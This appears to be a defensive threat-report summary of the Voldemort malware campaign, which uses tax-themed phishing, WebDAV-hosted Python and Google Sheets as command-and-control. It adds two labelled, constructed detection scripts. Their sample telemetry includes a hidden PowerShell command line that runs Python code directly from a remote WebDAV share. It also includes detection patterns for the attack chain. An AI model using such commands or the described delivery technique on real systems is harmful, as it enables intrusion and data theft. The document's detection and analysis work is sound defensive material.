Cybersecurity researchers discovered a novel malware campaign using Google Sheets as a command-and-control (C2) mechanism. Detected by Proofpoint starting August 5, 2024, the campaign impersonates tax authorities from various countries to target over 70 organizations globally using a custom tool called Voldemort. The campaign has not been attributed to a specific threat actor, but it resembles both cyber espionage and cybercrime activities.
Targeted Sectors:
- A wide range of sectors including insurance, aerospace, transportation, academia, finance, technology, industrial, healthcare, automotive, hospitality, energy, government, media, manufacturing, telecom, and social benefit organizations.
Attack Methodology:
- The campaign sends phishing emails claiming to be from tax authorities in several countries (U.S., U.K., France, Germany, Italy, India, Japan).
- Emails direct recipients to Google AMP Cache URLs, which lead to an intermediate page that checks if the operating system is Windows.
- If Windows is detected, it uses the search-ms: URI protocol to display a malicious Windows shortcut (LNK) file disguised as a PDF.
- Executing the LNK file triggers PowerShell to run a Python script directly from a WebDAV share; nothing is written to disk, and the script's dependencies are loaded from the same share.
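The delivery chain above leaves a distinctive trail in endpoint process-creation telemetry: a browser handing a search-ms: URI to Explorer, then PowerShell being launched with a WebDAV UNC path on its command line, then an interpreter whose image path is on a network share rather than local disk. The following detection logic is an added example written for this summary, not Proofpoint's code or any published rule. The event schema, the sample records and the 203.0.113.10 address are constructed for illustration; only the `\\host@SSL\DavWWWRoot` WebDAV path convention is real Windows behaviour.

```python
import re
from dataclasses import dataclass

# Hypothetical, simplified process-creation record (a subset of the fields an
# EDR or Sysmon "process create" event carries). Field names are our own.
@dataclass
class ProcessEvent:
    event_id: int
    parent_image: str
    image: str
    command_line: str

# Windows WebDAV mini-redirector UNC forms: \\host@SSL\DavWWWRoot\... or \\host@port\...
WEBDAV_UNC = re.compile(r"\\\\[\w.\-]+@(?:SSL|\d+)\\", re.IGNORECASE)
# Any UNC path (\\host\share\...); the host part may carry an @SSL/@port suffix.
UNC_ANY = re.compile(r"\\\\[\w.\-@]+\\")
SEARCH_MS = re.compile(r"search-ms:", re.IGNORECASE)
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the reasons (possibly none) this event matches the delivery chain."""
    reasons = []
    parent, image, cl = basename(ev.parent_image), basename(ev.image), ev.command_line
    if parent in BROWSERS and SEARCH_MS.search(cl):
        reasons.append("search-ms: URI handed to Explorer by a browser")
    if image in POWERSHELL and WEBDAV_UNC.search(cl):
        reasons.append("PowerShell command line references a WebDAV share")
    if image in POWERSHELL and "python" in cl.lower() and UNC_ANY.search(cl):
        reasons.append("PowerShell runs Python from a remote share")
    if ev.image.startswith("\\\\"):
        reasons.append("process image lives on a network share, not local disk")
    return reasons


def detect(events):
    """Return [(event_id, reasons)] for every event that matched at least one rule."""
    return [(ev.event_id, r) for ev in events if (r := score_event(ev))]


# Constructed sample telemetry; 203.0.113.10 is a documentation address, not a real IoC.
SAMPLE_EVENTS = [
    ProcessEvent(1, r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -NoProfile -File C:\Users\alice\scripts\backup.ps1"),
    ProcessEvent(2, r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                 r"C:\Windows\explorer.exe",
                 r'"C:\Windows\explorer.exe" "search-ms:crumb=location:\\203.0.113.10@SSL\DavWWWRoot"'),
    ProcessEvent(3, r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -w hidden \\203.0.113.10@SSL\DavWWWRoot\python\python.exe \\203.0.113.10@SSL\DavWWWRoot\tax_form.py"),
    ProcessEvent(4, r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\svchost.exe", r"svchost.exe -k netsvcs"),
    ProcessEvent(5, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"\\203.0.113.10@SSL\DavWWWRoot\python\python.exe",
                 r"\\203.0.113.10@SSL\DavWWWRoot\python\python.exe \\203.0.113.10@SSL\DavWWWRoot\tax_form.py"),
]

if __name__ == "__main__":
    for event_id, reasons in detect(SAMPLE_EVENTS):
        print(event_id, "->", "; ".join(reasons))
```

Each rule on its own is noisy in an environment that legitimately uses WebDAV; the value is in the sequence, so in production the four reasons would be correlated across parent/child events within a short window rather than alerted on individually.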
Malware Capabilities:
- The Python script collects system information and sends it as a Base64-encoded string to an actor-controlled domain.
- It also shows a decoy PDF to the user and downloads a password-protected ZIP file from OpenDrive containing:
  - A legitimate executable (“CiscoCollabHost.exe”) vulnerable to DLL side-loading.
  - A malicious DLL (“CiscoSparkLauncher.dll”), which is the Voldemort backdoor itself, a custom implant written in C.
- Voldemort uses Google Sheets for C2 communication, data exfiltration, and executing commands.
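Because the C2 channel rides on a legitimate Google service, blocking by destination is not an option; the defensible signal is which process talks to the Sheets API and how regularly. The script below is an added example for this summary, not Proofpoint's tooling. It assumes a Sheets-based C2 uses the public Sheets REST API host (sheets.googleapis.com) and the Google OAuth token endpoint (oauth2.googleapis.com), both real endpoints, and that the traffic is attributed to CiscoCollabHost.exe, the side-loading host named above. The log format, timestamps and SHEET_ID_PLACEHOLDER are constructed.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Hosts a Google Sheets based C2 channel needs: the Sheets REST API and the
# OAuth token endpoint used to obtain an access token for it (assumption).
SHEETS_C2_HOSTS = {"sheets.googleapis.com", "oauth2.googleapis.com"}

# Processes for which Google API traffic is expected. A production allowlist
# would also carry sanctioned Google desktop clients and sync agents.
EXPECTED_CLIENTS = {"chrome.exe", "msedge.exe", "firefox.exe"}


def parse_log(text):
    """Parse constructed '<iso timestamp> <process> <host> <method> <path>' lines."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, proc, host, method, path = line.split(maxsplit=4)
        events.append({"ts": datetime.fromisoformat(ts), "process": proc,
                       "host": host, "method": method, "path": path})
    return events


def is_periodic(timestamps, min_intervals=3, max_cv=0.2):
    """True when inter-request gaps are regular enough to look like a beacon.

    Uses the coefficient of variation (stdev / mean) of the gaps; a human in a
    browser produces irregular gaps, a polling implant produces near-constant ones.
    """
    if len(timestamps) < min_intervals + 1:
        return False
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mean = statistics.mean(gaps)
    if mean == 0:
        return False
    return statistics.pstdev(gaps) / mean <= max_cv


def detect(text):
    """Return {process: {host: {"count": n, "periodic": bool}}} for unexpected clients."""
    groups = defaultdict(list)
    for ev in parse_log(text):
        if ev["host"] in SHEETS_C2_HOSTS and ev["process"].lower() not in EXPECTED_CLIENTS:
            groups[(ev["process"], ev["host"])].append(ev["ts"])
    findings = defaultdict(dict)
    for (proc, host), stamps in groups.items():
        findings[proc][host] = {"count": len(stamps), "periodic": is_periodic(stamps)}
    return dict(findings)


# Constructed sample proxy/EDR network log (not real captured traffic).
SAMPLE_LOG = """\
2024-08-06T09:00:00 msedge.exe docs.google.com GET /spreadsheets/d/SHEET_ID_PLACEHOLDER/edit
2024-08-06T09:00:05 CiscoCollabHost.exe oauth2.googleapis.com POST /token
2024-08-06T09:00:06 CiscoCollabHost.exe sheets.googleapis.com GET /v4/spreadsheets/SHEET_ID_PLACEHOLDER/values/A1:B1
2024-08-06T09:01:06 CiscoCollabHost.exe sheets.googleapis.com GET /v4/spreadsheets/SHEET_ID_PLACEHOLDER/values/A1:B1
2024-08-06T09:02:06 CiscoCollabHost.exe sheets.googleapis.com PUT /v4/spreadsheets/SHEET_ID_PLACEHOLDER/values/A2
2024-08-06T09:03:06 CiscoCollabHost.exe sheets.googleapis.com GET /v4/spreadsheets/SHEET_ID_PLACEHOLDER/values/A1:B1
2024-08-06T09:04:06 CiscoCollabHost.exe sheets.googleapis.com GET /v4/spreadsheets/SHEET_ID_PLACEHOLDER/values/A1:B1
2024-08-06T09:10:00 outlook.exe outlook.office365.com GET /owa/
"""

if __name__ == "__main__":
    for proc, hosts in detect(SAMPLE_LOG).items():
        for host, info in hosts.items():
            print(f"{proc} -> {host}: {info['count']} requests, periodic={info['periodic']}")
```

The process attribution is the part that matters: without an endpoint agent or a proxy that records the originating binary, Sheets API traffic from a workstation is indistinguishable from normal use, which is exactly why this C2 choice is attractive to the operator.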
Techniques and Tools:
- The campaign abuses file-scheme URIs (“file://”) to reach external resources over WebDAV and SMB for malware staging.
- These tactics are common among initial access brokers (IABs) like Latrodectus, DarkGate, and XWorm.
Findings and Observations:
- Through the Google Sheets C2 channel, Proofpoint identified six victims, one of which may be a sandbox or a researcher's machine.
- The campaign appears to have cast a wide net before focusing on a smaller set of targets.
- The campaign combines sophisticated techniques with basic methods, making it difficult to assess the threat actor’s technical capabilities and final objectives.
Context and Implications:
- The campaign reflects a “Frankensteinian” mix of advanced and rudimentary tactics, complicating attribution and threat assessment.
- The activity points to a possible espionage motive, although the campaign's final objectives remain unknown.
- Netskope Threat Labs recently reported an updated version of the Latrodectus malware, highlighting ongoing evolution and feature enhancements, which include new backdoor commands for downloading shellcode and retrieving files.